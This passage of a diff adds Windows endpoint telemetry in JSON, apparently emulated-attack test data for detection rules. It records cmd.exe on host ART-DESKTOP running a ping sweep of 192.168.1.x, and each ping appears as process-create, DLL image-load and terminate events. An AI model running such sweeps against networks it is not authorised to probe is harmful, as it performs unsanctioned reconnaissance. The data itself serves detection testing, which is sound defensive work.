"msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3500, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572003700016, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3500, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572003700016, + "unique_pid": 
"{42FC7E13-CB50-5C05-0000-0010CA705101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3500, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572003700016, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3500, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572003700016, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3500, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572003700016, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3500, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572003700016, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3500, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572003860000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" + }, + { + "event_type": "process", + "pid": 3500, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572004170000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.3", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + 
"parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1480, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572004310000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1480, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004170000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1480, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004170000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1480, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004330000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1480, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004330000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1480, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004330000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" + }, 
+ { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1480, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004330000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1480, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004330000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1480, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004330000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1480, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004330000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1480, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004330000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1480, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004330000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" + }, + { + "event_type": "process", + "pid": 1480, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572004640000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010C1735101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.4", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 996, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572004870000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004800000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004800000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004800000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004800000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" + }, + { + 
"event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004800000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004800000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004800000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004800000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004960000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004960000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 996, + 
"process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572004960000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" + }, + { + "event_type": "process", + "pid": 996, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572006840000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010B8765101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.5", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3004, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572006980000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3004, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572006990000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3004, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572006990000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3004, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572006990000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" + }, + { + "event_type": "image_load", + "image_name": 
"KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3004, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572006990000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3004, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572006990000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3004, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572006990000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3004, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572006990000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3004, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572006990000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3004, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572006990000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3004, + "process_name": "PING.EXE", + 
"process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572006990000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3004, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572006990000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" + }, + { + "event_type": "process", + "pid": 3004, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572011840000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-001027795101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.6", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4736, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572011980000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572011990000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572011990000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": 
"C:\\Windows\\System32\\kernel32.dll", + "pid": 4736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572011990000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572011990000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572011990000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572011990000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572011990000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572011990000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4736, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572011990000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572011990000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572011990000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" + }, + { + "event_type": "process", + "pid": 4736, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572016840000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010947B5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.7", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7988, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572016980000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572016980000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": 
"C:\\Windows\\System32\\ntdll.dll", + "pid": 7988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572016980000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572016980000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572016980000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572016980000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572016980000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572016980000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7988, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572016980000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572016980000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572016980000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572016980000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" + }, + { + "event_type": "process", + "pid": 7988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572021990000, + "unique_pid": "{42FC7E13-CB51-5C05-0000-0010287E5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.8", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4412, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572022140000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": 
"C:\\Windows\\System32\\PING.EXE", + "pid": 4412, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572022140000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4412, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572022140000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4412, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572022140000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4412, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572022140000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4412, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572022140000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4412, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572022140000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4412, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572022140000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4412, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572022140000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4412, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572022140000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4412, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572022140000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4412, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572022140000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" + }, + { + "event_type": "process", + "pid": 4412, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572026840000, + "unique_pid": "{42FC7E13-CB52-5C05-0000-001097805101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.9", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5688, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 
